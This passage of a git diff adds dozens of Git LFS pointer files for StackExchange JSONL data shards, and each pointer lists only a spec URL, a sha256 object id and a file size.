sha256:a690a8db3d6cabb9a308108e0fd6445d6d70c129c52dd31c7e152a831d1f51db +size 37463806 diff --git a/data/stackexchange/1-1/1203_2289.jsonl b/data/stackexchange/1-1/1203_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..12a127b5543c667bc58229bb324a0d3f84ca5e44 --- /dev/null +++ b/data/stackexchange/1-1/1203_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2af1e8eab4f3d0c98d03e070975f908d71c9463d533629c7286e10dfeca87fd0 +size 37639020 diff --git a/data/stackexchange/1-1/1204_2289.jsonl b/data/stackexchange/1-1/1204_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b76b08163794d5f29a479af23e470380c1ce5483 --- /dev/null +++ b/data/stackexchange/1-1/1204_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:009acc011dc781fb563c173f9682c3bdde18d1bd1c5ec4af884721d8f6e3981a +size 37739180 diff --git a/data/stackexchange/1-1/1205_2289.jsonl b/data/stackexchange/1-1/1205_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4bfc1e26f5ca6485d6da81a6e145f6407bcaa8a2 --- /dev/null +++ b/data/stackexchange/1-1/1205_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a35839a9977a696065175c476ca056f07e9aeb3fc43e9fa7f8a29ec820b0cb2b +size 37943353 diff --git a/data/stackexchange/1-1/1206_2289.jsonl b/data/stackexchange/1-1/1206_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..0e75a8452f9e76dab647a27b9133fb9de001b969 --- /dev/null +++ b/data/stackexchange/1-1/1206_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:96f602fcd1de532084ab8f28aa30b010d58330dd99f5d09d01ad859a49b852ec +size 37342752 diff --git a/data/stackexchange/1-1/1207_2289.jsonl b/data/stackexchange/1-1/1207_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..32e31715cf52d6de716e22e9bfecc8d1805a3588 --- /dev/null +++ b/data/stackexchange/1-1/1207_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8f0424e72706b88003d753f96d9887ef2d9457b7cba4b8a4c561d83819cf0704 +size 37560487 diff --git a/data/stackexchange/1-1/1208_2289.jsonl b/data/stackexchange/1-1/1208_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5b8b334176a1e4097a3c3c086a51d420a7ae0d51 --- /dev/null +++ b/data/stackexchange/1-1/1208_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:79c3366842708ed5b9264ac14ea0e75fd969e28fa5a6bc30146b23affb79c2aa +size 38303521 diff --git a/data/stackexchange/1-1/1209_2289.jsonl b/data/stackexchange/1-1/1209_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2ef5d770cedec16dd5c6d638551e4a6ea36d1dbe --- /dev/null +++ b/data/stackexchange/1-1/1209_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:060f788b926bfba9a66ac996acc68c90440049bd4d64402270899bd14ffe6a69 +size 37755380 diff --git a/data/stackexchange/1-1/120_2289.jsonl b/data/stackexchange/1-1/120_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..baa82298dba583c4a97d002bad0f6d0712870f52 --- /dev/null +++ b/data/stackexchange/1-1/120_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a4ee1bf89fdcf396d24faa7272ec8035a5478b97c48a3c1f42eba237387df012 +size 33540981 diff --git a/data/stackexchange/1-1/1210_2289.jsonl b/data/stackexchange/1-1/1210_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c7462b2077ef9b06a1df7dfcd39cade3876dc249 --- /dev/null +++ b/data/stackexchange/1-1/1210_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5177e83b12067ac8b46b7bb8284a9822371698a00b9d907fe91f8b6a9745f8db +size 37507549 diff --git a/data/stackexchange/1-1/1211_2289.jsonl b/data/stackexchange/1-1/1211_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..19872cf5721fe3276b96f1f11f3947ddc152492b --- /dev/null +++ b/data/stackexchange/1-1/1211_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:45b479ef078bcfc6aa8cd0c41eab41244885f17a6a87ff8a0e85a295dce228a9 +size 37358801 diff --git a/data/stackexchange/1-1/1212_2289.jsonl b/data/stackexchange/1-1/1212_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..41c094b2c1fd3e0a2df8c0ee7ef2de06b9262429 --- /dev/null +++ b/data/stackexchange/1-1/1212_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c4773ef50c42fa87a5e7b449265e36ab35289bedabd4dafcc152fc5301d89dd7 +size 37536756 diff --git a/data/stackexchange/1-1/1213_2289.jsonl b/data/stackexchange/1-1/1213_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6bb65fb1fb8af54f38160caab0efe0f9108deecd --- /dev/null +++ b/data/stackexchange/1-1/1213_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:b37f0da326d2516bf9afe5d6a3639959b2bc296e66607ee1a7a13ab5da5e8420 +size 37888187 diff --git a/data/stackexchange/1-1/1214_2289.jsonl b/data/stackexchange/1-1/1214_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a1e84df371a7d0f79594ecee2f324566fe372167 --- /dev/null +++ b/data/stackexchange/1-1/1214_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9709372e7ec7035dd8834de5ca8954e00a608793f042d65d695a9575f0783bdb +size 37814407 diff --git a/data/stackexchange/1-1/1215_2289.jsonl b/data/stackexchange/1-1/1215_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c2f9e8311b5babd733fba5f613f4414aaf86e047 --- /dev/null +++ b/data/stackexchange/1-1/1215_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7008dc9980b7717f2b7df67ad57d7ae56ea9540a6da8876d47f294d4bddb8f70 +size 37810200 diff --git a/data/stackexchange/1-1/1216_2289.jsonl b/data/stackexchange/1-1/1216_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4fb2c7abb10938dd2636233a4343f4b1c8b9b7fc --- /dev/null +++ b/data/stackexchange/1-1/1216_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e72f45ab73ad8056f7d251716ae7f94094b20af588979f242436390a869b6e08 +size 37974415 diff --git a/data/stackexchange/1-1/1217_2289.jsonl b/data/stackexchange/1-1/1217_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5262d5190dbadc00c59116b0f16e95762cce0b19 --- /dev/null +++ b/data/stackexchange/1-1/1217_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:11db6d2e4227f109a9748694bc16ce51122d640c410cc5cb267eb496af33e5ba +size 37310745 diff --git a/data/stackexchange/1-1/1218_2289.jsonl b/data/stackexchange/1-1/1218_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..933655d57388a7a3a8106845cca1b7d550bd3683 --- /dev/null +++ b/data/stackexchange/1-1/1218_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2f8a16db909e70ce1192be4990f0f1f17cc3b416d1826eadf6a119ba5d1acc79 +size 38378966 diff --git a/data/stackexchange/1-1/1219_2289.jsonl b/data/stackexchange/1-1/1219_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..82781b9624f42c50c8e2ffb7cafe9146568716a8 --- /dev/null +++ b/data/stackexchange/1-1/1219_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5e7202eadb78e1a313535d97f34c8190907945444bbd0d1db1e51d981c7d2928 +size 37662769 diff --git a/data/stackexchange/1-1/121_2289.jsonl b/data/stackexchange/1-1/121_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b4070c5210000e1d512799da93f32bbe053197eb --- /dev/null +++ b/data/stackexchange/1-1/121_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1f2434944c2b4468dac11d57b142f719dd4bdf7fe4e1b0b2b05e3304dbe42393 +size 33646594 diff --git a/data/stackexchange/1-1/1220_2289.jsonl b/data/stackexchange/1-1/1220_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1262c3e0b3593d8c8686652b22aa66b818558d8c --- /dev/null +++ b/data/stackexchange/1-1/1220_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:34db630cf2a5f82fefb78bcf4970333331d8c673365efb42df1ca2c2ca89e4f7 +size 37514209 diff --git a/data/stackexchange/1-1/1221_2289.jsonl b/data/stackexchange/1-1/1221_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..4a87f508e2163a943a75ecd45904e2110ed1209c --- /dev/null +++ b/data/stackexchange/1-1/1221_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fbeb54eca0562c87a4fa7a19d90b2d6f12f9f5346da2f36a6202b499f1f5826d +size 37433271 diff --git a/data/stackexchange/1-1/1222_2289.jsonl b/data/stackexchange/1-1/1222_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..141179919c18bfbac9c9cb52f7e7f0bbc37fe81a --- /dev/null +++ b/data/stackexchange/1-1/1222_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8aae3bcd60e8299d53f4e50378288638bff00628decc3390533d68452da95805 +size 38564329 diff --git a/data/stackexchange/1-1/1223_2289.jsonl b/data/stackexchange/1-1/1223_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e379464813cb2703105af0c43d7753eb6c3ec780 --- /dev/null +++ b/data/stackexchange/1-1/1223_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:92574eb34c0aa81607a02b537d8d00e767a081e34a1f166fea137abe7accc887 +size 38060040 diff --git a/data/stackexchange/1-1/1224_2289.jsonl b/data/stackexchange/1-1/1224_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f77990081362cfcd4de6c1539f515e8c1805c10e --- /dev/null +++ b/data/stackexchange/1-1/1224_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6dd078d55c2ef885c6d70c9c56b87bebd4aaa07d9143afb60f9d542eac2283fc +size 37731182 diff --git a/data/stackexchange/1-1/1225_2289.jsonl b/data/stackexchange/1-1/1225_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e4c580fbda715d6ed5abc98e62cad1e18fb962cb --- /dev/null +++ b/data/stackexchange/1-1/1225_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fcb061982d6aedd852d71070464532dcef20b05e15045e224e632f18ccd17771 +size 37779918 diff --git a/data/stackexchange/1-1/1226_2289.jsonl b/data/stackexchange/1-1/1226_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..667a90ee06bfd5244e8b0eb104e184fa948bdc79 --- /dev/null +++ b/data/stackexchange/1-1/1226_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2ecf614eda025b3acdd95acc0b54a26b1a320fd03782e4fbf6c644756488158f +size 38094943 diff --git a/data/stackexchange/1-1/1227_2289.jsonl b/data/stackexchange/1-1/1227_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..37b0702084683e5b3d2ba6589b94fff97e67638a --- /dev/null +++ b/data/stackexchange/1-1/1227_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:337b9395021257b69a7ddea50853621fad8554382f6039c64607f850f5f82048 +size 38590866 diff --git a/data/stackexchange/1-1/1228_2289.jsonl b/data/stackexchange/1-1/1228_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c14963bd385b5c1c900d93069a5cf948a4130495 --- /dev/null +++ b/data/stackexchange/1-1/1228_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f0ae828606d28e18a064fb82e6417dc0933a48028eceea3d70e4ccb6e39933ad +size 37742207 diff --git a/data/stackexchange/1-1/1229_2289.jsonl b/data/stackexchange/1-1/1229_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..78689e04088d536d88ca5ae08f1e61ec99e35209 --- /dev/null +++ b/data/stackexchange/1-1/1229_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:1f2148ce64830464e69030e27e6ba8436b396c8745addbbb29ccfb48185131e8 +size 37559129 diff --git a/data/stackexchange/1-1/122_2289.jsonl b/data/stackexchange/1-1/122_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..110e609ecac10c176f093d91a30e768d706cbf54 --- /dev/null +++ b/data/stackexchange/1-1/122_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:18ef145c6008b7c18264548e290fcf09fc9f98d9bc383bc9a18ec9911b248859 +size 33833843 diff --git a/data/stackexchange/1-1/1230_2289.jsonl b/data/stackexchange/1-1/1230_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d66d57eaf2c723daeaab9121d86fdcf3dd054767 --- /dev/null +++ b/data/stackexchange/1-1/1230_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:55d69c18975a3ab7a6d400d3a4a9fca6c9fe343da2b86b00dd954e587dbec98e +size 37790821 diff --git a/data/stackexchange/1-1/1231_2289.jsonl b/data/stackexchange/1-1/1231_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c7ea607af0fde4a301bd86ddac4c5cbbc0f1e460 --- /dev/null +++ b/data/stackexchange/1-1/1231_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b71f1faa571b1a4511e2beed6f32837abffa0fa93f2952932919ec7d9da55d77 +size 37726135 diff --git a/data/stackexchange/1-1/1232_2289.jsonl b/data/stackexchange/1-1/1232_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4a7d5c849ba031a1ba48b84c06f347398282ebae --- /dev/null +++ b/data/stackexchange/1-1/1232_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ee2a43fba229353d96a81c9378d082a03de781381b7b89e81692c0805ad50fab +size 38026700 diff --git a/data/stackexchange/1-1/1233_2289.jsonl b/data/stackexchange/1-1/1233_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3dfe0561f313f9659279ca1e056ba6d3d3ff78a5 --- /dev/null +++ b/data/stackexchange/1-1/1233_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c539028c82b915b2223f50a93bf46ef81ffeae30c87b78140c920fe79738a933 +size 37964347 diff --git a/data/stackexchange/1-1/1234_2289.jsonl b/data/stackexchange/1-1/1234_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c2e9e52a9ca00b2a9c789208612abb7937b74533 --- /dev/null +++ b/data/stackexchange/1-1/1234_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9abf44f8398e2429d5e6233234820974855aea1d1e9c9decd6d0d830115563dd +size 37739524 diff --git a/data/stackexchange/1-1/1235_2289.jsonl b/data/stackexchange/1-1/1235_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..666a3c47d4525fea95ce01825b11031f291cde7e --- /dev/null +++ b/data/stackexchange/1-1/1235_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:830695bdf73c524f81a9f9ecbd680521499e63c24497e0e8f9f0e8ddf4e48c2e +size 37717490 diff --git a/data/stackexchange/1-1/1236_2289.jsonl b/data/stackexchange/1-1/1236_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a1577390225612104a9cafb3f7787fc3ea3c261b --- /dev/null +++ b/data/stackexchange/1-1/1236_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e5f41266f3d8fa4dfe4cdcff9bc06174523dff6b0e9f906ef2ef2361cc63c516 +size 37354951 diff --git a/data/stackexchange/1-1/1237_2289.jsonl b/data/stackexchange/1-1/1237_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..0b67b48edc7cda9cd1699d60b16d27f107ce04b9 --- /dev/null +++ b/data/stackexchange/1-1/1237_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:769d44557fbaf02db53e346b505843e83afb95f5dc6118ee0741b5d1f246d375 +size 37816330 diff --git a/data/stackexchange/1-1/1238_2289.jsonl b/data/stackexchange/1-1/1238_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..155aa5dd456955a2bb8f4735a67c06ad2cf39f3b --- /dev/null +++ b/data/stackexchange/1-1/1238_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:aea1692881d1205b9b5d655bf95e5304b82d8d433bbf2a8f1a918974eafdc70f +size 37532905 diff --git a/data/stackexchange/1-1/1239_2289.jsonl b/data/stackexchange/1-1/1239_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..59f22fd8b7c3d87f5a1d924d10887cb8b748e5a9 --- /dev/null +++ b/data/stackexchange/1-1/1239_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a6d636c489eae6beb9ec898582ab04afeaabc088c129ec1fe96dc65759112323 +size 34833121 diff --git a/data/stackexchange/1-1/123_2289.jsonl b/data/stackexchange/1-1/123_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..54a3f896ceab576b028131db9200a3150559087a --- /dev/null +++ b/data/stackexchange/1-1/123_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4020ec72b21bade6f32c429f27d7a2064520cdd6a708eae482accf3c8b024f63 +size 33553263 diff --git a/data/stackexchange/1-1/1240_2289.jsonl b/data/stackexchange/1-1/1240_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..975376d1be0788124d92fbd5986223e923538c74 --- /dev/null +++ b/data/stackexchange/1-1/1240_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:93462f69e92ff351a6468466221c9bc1b7e97429158586feee8f425c6b92d0ab +size 35299263 diff --git a/data/stackexchange/1-1/1241_2289.jsonl b/data/stackexchange/1-1/1241_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..42df8052fb5422d64d81bf87fbf34f25c67bf4ec --- /dev/null +++ b/data/stackexchange/1-1/1241_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f247e8bff3a4393fec9b361d531974490017923c55de3d87674f54cf10f9218c +size 34914726 diff --git a/data/stackexchange/1-1/1242_2289.jsonl b/data/stackexchange/1-1/1242_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e3ec62cd0f3339d84732a606f915025ed4468f65 --- /dev/null +++ b/data/stackexchange/1-1/1242_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:772bc77ea0bc57a41dce5345601ac02849330122fa35cc3c20138e79aec17e30 +size 35377677 diff --git a/data/stackexchange/1-1/1243_2289.jsonl b/data/stackexchange/1-1/1243_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c65bcdbf925d193f10c1094d2b37c1fba179d61a --- /dev/null +++ b/data/stackexchange/1-1/1243_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2a11bc261f4b6134ea003a2e7e4fc1f4b0eade8e149b0ccb3cdea23db501dbb3 +size 34750052 diff --git a/data/stackexchange/1-1/1244_2289.jsonl b/data/stackexchange/1-1/1244_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..07926573068bcbd574adb469b02be82b09267663 --- /dev/null +++ b/data/stackexchange/1-1/1244_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:42c3e78fcbeb597417a97f47648112616a2b186ce649b6dda9b64da5d95f518d +size 35014034 diff --git a/data/stackexchange/1-1/1245_2289.jsonl b/data/stackexchange/1-1/1245_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..da2d9459826327b38b7efa7af4af9edb85a533d9 --- /dev/null +++ b/data/stackexchange/1-1/1245_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e782fe4c50458ae8cd1d5557aebc2c290bfc516a65f24bbec56d3c1f206f216d +size 34946018 diff --git a/data/stackexchange/1-1/1246_2289.jsonl b/data/stackexchange/1-1/1246_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1ae1199bb866b1f1fcf8f1b13049acbb8d58afc7 --- /dev/null +++ b/data/stackexchange/1-1/1246_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4439b5468b11ae8b8399d697f9329ef9dc682c5fb6963e59571ef84053e72fd8 +size 34796762 diff --git a/data/stackexchange/1-1/1247_2289.jsonl b/data/stackexchange/1-1/1247_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9e2daf1e8f3471cd2b615c29a6c6ec91d06129e2 --- /dev/null +++ b/data/stackexchange/1-1/1247_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b75b2125ad1fa37f2a532f13b7919307570b5dc1b558fd41b8771ae62aca0777 +size 34417237 diff --git a/data/stackexchange/1-1/1248_2289.jsonl b/data/stackexchange/1-1/1248_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7f1d2fe15ed1c3c4f7d287222a34d32312c4b90c --- /dev/null +++ b/data/stackexchange/1-1/1248_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b9fb96b6c029a382946f0caa8d7ae78891d17b654785e69f5f1d793099b43da1 +size 35698589 diff --git a/data/stackexchange/1-1/1249_2289.jsonl b/data/stackexchange/1-1/1249_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4de6b0c013b43a96c3c8180b529ace24119d2b90 --- /dev/null +++ b/data/stackexchange/1-1/1249_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:674947f694e667cc5a82567663fcf5ca55f62696f3a644cdbe3a278d335c2f1c +size 34836839 diff --git a/data/stackexchange/1-1/124_2289.jsonl b/data/stackexchange/1-1/124_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d72f94974da1add30c744668b91846d78a3a3f10 --- /dev/null +++ b/data/stackexchange/1-1/124_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:66cde3a3ab7fa12bd0058d1424e11e88ae1c5e481da095bbad76f94b7be9450b +size 33251086 diff --git a/data/stackexchange/1-1/1250_2289.jsonl b/data/stackexchange/1-1/1250_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d2cc5b9628e45bf545c970a59f6242f8558fc053 --- /dev/null +++ b/data/stackexchange/1-1/1250_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e0dec0ce9d838a36a0b817a2af40fbefa858710e2e57c995a1d8d318d2af5a37 +size 35389391 diff --git a/data/stackexchange/1-1/1251_2289.jsonl b/data/stackexchange/1-1/1251_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c0fdb8c198c88ddba23d8b210036f41825512d43 --- /dev/null +++ b/data/stackexchange/1-1/1251_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0537d59afe4c18cac1ff1e1c5c841aaf5ccaf3d7c714315d7363e1b823eaa129 +size 34479882 diff --git a/data/stackexchange/1-1/1252_2289.jsonl b/data/stackexchange/1-1/1252_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..a1135c8b72b55fe25aaf25a9b1c9bd22b3088e61 --- /dev/null +++ b/data/stackexchange/1-1/1252_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8080299ca0fdc366e6a1f93f84c7852a962daacb0d5cb4a33afd7665f31753d1 +size 35383000 diff --git a/data/stackexchange/1-1/1253_2289.jsonl b/data/stackexchange/1-1/1253_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..297f2c9cb0ddfec594a4d19815ba686e0eda0105 --- /dev/null +++ b/data/stackexchange/1-1/1253_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ab1362be1ae8f4471790ad8eedc8a23dc35aa08be0fe7b3f76972f04b0bb1857 +size 35273259 diff --git a/data/stackexchange/1-1/1254_2289.jsonl b/data/stackexchange/1-1/1254_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b1429acd26eddfb9d1e257b03898f1d30dbeba48 --- /dev/null +++ b/data/stackexchange/1-1/1254_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6c69a9eb7d6d1d2b8c603bb2405336c137370b40111dccc087c51a8925bb0ce5 +size 34765193 diff --git a/data/stackexchange/1-1/1255_2289.jsonl b/data/stackexchange/1-1/1255_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..def0c06e0ba23909bf39c3c1ad466ba8e5fae8ec --- /dev/null +++ b/data/stackexchange/1-1/1255_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c93a5fbad7d6bac7e3609bf238092124a617cd181168c85c97865b0feb8e3dcc +size 35319235 diff --git a/data/stackexchange/1-1/1256_2289.jsonl b/data/stackexchange/1-1/1256_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9011fdcdfd2fc626ad9294c8c566f23ac088abea --- /dev/null +++ b/data/stackexchange/1-1/1256_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c7991328d60f3414dbcdac2723e99e303024f1f2717e4169f392014a48f32584 +size 34734748 diff --git a/data/stackexchange/1-1/1257_2289.jsonl b/data/stackexchange/1-1/1257_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5194a1692c3d8466469a2514cf9b3485b2e24c66 --- /dev/null +++ b/data/stackexchange/1-1/1257_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:078976a7c539a25ff412c83cdad70f362755904b09ec2e1a2a2af3a9f7ceaa33 +size 34277770 diff --git a/data/stackexchange/1-1/1258_2289.jsonl b/data/stackexchange/1-1/1258_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..edfdaa9e2f97401c6af60dcfef0663c99858d571 --- /dev/null +++ b/data/stackexchange/1-1/1258_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:612db88d2b3d42a5f89ab3c81aa7051d3137f4ad68a8a53c6bec3f97c6aaa1a0 +size 35049802 diff --git a/data/stackexchange/1-1/1259_2289.jsonl b/data/stackexchange/1-1/1259_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..12a7af80dda08e480849993d97d72585e990ceed --- /dev/null +++ b/data/stackexchange/1-1/1259_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6bc68ac248cdfffc22130787fc7b352ef1d31771b305a85ba45fb73c5747df55 +size 34554079 diff --git a/data/stackexchange/1-1/125_2289.jsonl b/data/stackexchange/1-1/125_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2fc780e4ec47ad0882dcd41de57f307a61b769f8 --- /dev/null +++ b/data/stackexchange/1-1/125_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:f985447d36481e27902ba14773cc82fbb7630bcb899a1e6f901530a53bb563ad +size 33770618 diff --git a/data/stackexchange/1-1/1260_2289.jsonl b/data/stackexchange/1-1/1260_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b4a554761a41f131ef102b0cdb5409417013440f --- /dev/null +++ b/data/stackexchange/1-1/1260_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fda7d8b608ce563d2e87524a72346901fcdc54babef3c6b92d2f4009203b4d91 +size 35178455 diff --git a/data/stackexchange/1-1/1261_2289.jsonl b/data/stackexchange/1-1/1261_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..104893d2f333c6699554c128cfc31e58a4b34e05 --- /dev/null +++ b/data/stackexchange/1-1/1261_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:00596feb398ee99618fcbfc6c329792ba261507c831cabeeeed1969c18983655 +size 34897837 diff --git 